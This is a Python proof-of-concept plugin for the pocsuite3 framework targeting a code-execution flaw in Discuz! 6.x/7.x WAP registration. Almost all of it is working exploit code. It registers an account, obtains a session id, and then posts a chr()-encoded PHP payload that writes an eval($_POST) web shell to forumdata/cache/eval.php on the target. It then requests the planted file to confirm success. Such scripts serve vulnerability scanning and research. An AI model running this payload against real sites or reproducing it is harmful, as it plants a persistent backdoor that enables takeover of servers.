""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ import re import time from pocsuite3.api import Output, POCBase, register_poc, requests class DemoPOC(POCBase): vulID = '1199' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2008-11-08' createDate = '2013-12-09' updateDate = '2013-12-09' references = ['http://huaidan.org/archives/2523.html'] name = 'Discuz! 7 /wap/index.php 代码执行漏洞 POC' appPowerLink = 'http://www.discuz.com' appName = 'Discuz' appVersion = '7#' vulType = 'Code Execution' desc = ''' Discuz! 6.x/7.x 存在$_DCACHE变量覆盖漏洞,如果网站开启了wap注册,将可以直接写入PHP文件至服务器。 ''' samples = [] install_requires = [''] def _verify(self): result = {} headers_fake = {} headers_fake['User-Agent'] = 'Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1' headers_fake['Content-Type'] = 'application/x-www-form-urlencoded' now_t = int(time.time()) key = str(now_t) target = self.url + '/wap/index.php' post1 = "action=register&username=" + key + "&password=" + key + "&email=" + key + "@360.cn&_DCACHE=1" reg = re.compile("logout=yes&formhash=[a-z0-9]{8}&sid=([a-zA-Z0-9]{6})") content = requests.post(target, data=post1, headers=headers_fake).text try: res = reg.findall(content) except: return self.parse_output(result) if not res: return self.parse_output(result) sid = res[0] post2 = "stylejump[1]=1&styleid=1&inajax=1&transsidstatus=1&sid=" + sid + "&creditsformula=${${fputs(fopen(chr(46).chr(46).chr(47).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(101).chr(118).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(56).chr(48).chr(118).chr(117).chr(108))}}" requests.post(target, 
post2, headers=headers_fake) shell_addr = self.url + "/forumdata/cache/eval.php" r = requests.get(shell_addr) if '80vul' in r.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = shell_addr return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() def _shell(self): pass register_poc(DemoPOC)
暂无官方解决方案
暂无防护方案